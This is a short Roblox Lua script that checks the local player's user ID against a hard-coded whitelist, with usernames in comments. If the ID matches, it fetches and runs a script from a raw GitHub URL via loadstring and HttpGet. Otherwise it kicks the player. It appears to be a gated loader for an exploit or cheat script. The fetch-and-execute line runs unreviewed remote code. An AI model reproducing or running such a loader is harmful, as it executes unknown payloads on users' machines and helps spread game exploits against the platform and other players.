local Player = game:GetService("Players").LocalPlayer
local WhitelistedIds = {
    2673957768, ---holy_punishher
    2258274790, ---07clips
    93046029, ---iiiMuji
    485257794, ---BETA
    2349605818,
    368758193, ---4_znx
    467072045, 
    103565251, ---Z0nhi
    29830504, ---6naga
    2394143462,
    508340762, ---SawMiss
    136036647, ---SawKerz
    1159880547, ---SawVelvet
    2518835349, ---Max
    2511158592, ---Jody 
    2534997488 , ---703labrat
}

if table.find(WhitelistedIds, Player.UserId) then
    loadstring(game:HttpGet("https://raw.githubusercontent.com/L4W13T/MTRNFESX/main/1whlms", true))()
else
    Player:Kick("You are not whitelisted to use this script")
end
